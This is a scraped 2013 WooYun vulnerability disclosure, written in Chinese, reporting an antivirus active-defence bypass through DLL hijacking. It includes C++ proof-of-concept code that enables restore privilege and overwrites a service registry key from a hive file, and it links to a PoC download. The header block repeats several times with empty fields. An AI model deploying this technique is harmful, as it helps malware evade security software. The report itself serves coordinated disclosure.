一种绕过绝大多数杀毒软件的方法(卡巴斯基、360、百度、腾讯、瑞星、江民、AVG、nod32)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-038250

漏洞标题：一种绕过绝大多数杀毒软件的方法(卡巴斯基、360、百度、腾讯、瑞星、江民、AVG、nod32)

漏洞作者： n0bele

提交时间：2013-09-26 14:29

修复时间：2013-12-25 14:30

公开时间：2013-12-25 14:30

漏洞类型：设计错误/逻辑缺陷

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-09-26：细节已通知厂商并且等待厂商处理中
2013-10-02：厂商已经确认，细节仅向厂商公开
2013-10-05：细节向第三方安全合作伙伴开放
2013-11-26：细节向核心白帽子及相关领域专家公开
2013-12-06：细节向普通白帽子公开
2013-12-16：细节向实习白帽子公开
2013-12-25：细节向公众公开

简要描述：

受影响厂商:包括但不仅限于卡巴斯基、360、百度、腾讯、瑞星、江民、AVG、nod32

详细说明：

杀毒软件在主动防御的时候过于依赖WFP，漏防了系统自身的文件，导致了恶意程序可能通过感染系统dll染过主动防御执行任意操作.
DllHijack POC代码:

BOOL EnableDebugPriv(LPCTSTR lpName)
{
	BOOL bRet = FALSE;
	HANDLE hToken = NULL;
	TOKEN_PRIVILEGES tp;
	LUID luid;
	do
	{
		if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken))
			break;
		if(!LookupPrivilegeValue(NULL,lpName,&luid))
			break;
		tp.PrivilegeCount = 1;
		tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
		tp.Privileges[0].Luid = luid;
		bRet = AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL);
	}
	while(FALSE);
	
	if(hToken != NULL)
		CloseHandle(hToken);
	return bRet;
}
BOOL RestoreReg(HKEY hKey,LPCWSTR lpSubKey,TCHAR szFilePath[MAX_PATH])
{
	BOOL bRet = FALSE;
	HKEY hCur = NULL;
	do
	{
		if(!EnableDebugPriv(SE_RESTORE_NAME))
			break;
		if(RegOpenKeyEx(hKey,lpSubKey,NULL,KEY_ALL_ACCESS,&hCur) != ERROR_SUCCESS &&
			RegCreateKey(hKey,lpSubKey,&hCur) != ERROR_SUCCESS)
			break;
		if(RegRestoreKey(hCur,szFilePath,REG_FORCE_RESTORE) != ERROR_SUCCESS)
			bRet = TRUE;
	}
	while(FALSE);
	if(hCur)
		RegCloseKey(hCur);
	return bRet;
}
BOOL CDllHijackApp::InitInstance()
{
	CWinApp::InitInstance();
	RestoreReg(HKEY_LOCAL_MACHINE,L"SYSTEM\\CurrentControlSet\\Services\\poc",L"C:\\poc.hiv");
	return TRUE;
}

漏洞证明：

poc下载地址http://pan.baidu.com/s/1uuF8Z

修复方案：

辅助WFP防护，校验文件

版权声明：转载请注明来源 n0bele@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2013-10-02 00:27

厂商回复：

CNVD确认并在多个软件实例上复现所述情况，对于绕过查杀思路原理上进行认定。后续评估情况待补充，国庆后将更新后续跟进分析及评估。
rank 15

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-038250

漏洞标题：一种绕过绝大多数杀毒软件的方法(卡巴斯基、360、百度、腾讯、瑞星、江民、AVG、nod32)

相关厂商：Cert

漏洞作者： n0bele

提交时间：2013-09-26 14:29

修复时间：2013-12-25 14:30

公开时间：2013-12-25 14:30

漏洞类型：设计错误/逻辑缺陷

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 n0bele@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-038250

漏洞标题：一种绕过绝大多数杀毒软件的方法(卡巴斯基、360、百度、腾讯、瑞星、江民、AVG、nod32)

相关厂商：Cert

漏洞作者： n0bele

提交时间：2013-09-26 14:29

修复时间：2013-12-25 14:30

公开时间：2013-12-25 14:30

漏洞类型：设计错误/逻辑缺陷

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-038250"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 n0bele@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：